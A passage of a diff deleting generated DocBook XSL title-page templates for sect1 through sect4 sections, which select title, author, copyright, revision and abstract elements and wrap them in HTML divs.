-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/legalnotice"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/pubdate"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/revision"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/revhistory"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/abstract"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect1.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="sect1.titlepage.before.recto"/>
-      <xsl:call-template name="sect1.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="sect1.titlepage.before.verso"/>
-      <xsl:call-template name="sect1.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="sect1.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect1.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect1.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="sect2info/title">
-      <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="sect2info/subtitle">
-      <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/corpauthor"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/authorgroup"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/author"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/othercredit"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/releaseinfo"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/copyright"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/legalnotice"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/pubdate"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/revision"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/revhistory"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/abstract"/>
-  <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect2.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="sect2.titlepage.before.recto"/>
-      <xsl:call-template name="sect2.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="sect2.titlepage.before.verso"/>
-      <xsl:call-template name="sect2.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="sect2.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect2.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect2.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="sect3info/title">
-      <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="sect3info/subtitle">
-      <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/corpauthor"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/authorgroup"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/author"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/othercredit"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/releaseinfo"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/copyright"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/legalnotice"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/pubdate"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/revision"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/revhistory"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/abstract"/>
-  <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect3.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="sect3.titlepage.before.recto"/>
-      <xsl:call-template name="sect3.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="sect3.titlepage.before.verso"/>
-      <xsl:call-template name="sect3.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="sect3.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect3.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect3.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="sect4info/title">
-      <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="sect4info/subtitle">
-      <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/corpauthor"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/authorgroup"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/author"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/othercredit"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/releaseinfo"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/copyright"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/legalnotice"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/pubdate"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/revision"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/revhistory"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/abstract"/>
-  <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect4.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="sect4.titlepage.before.recto"/>
-      <xsl:call-template name="sect4.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="sect4.titlepage.before.verso"/>
-      <xsl:call-template name="sect4.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="sect4.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect4.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect4.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
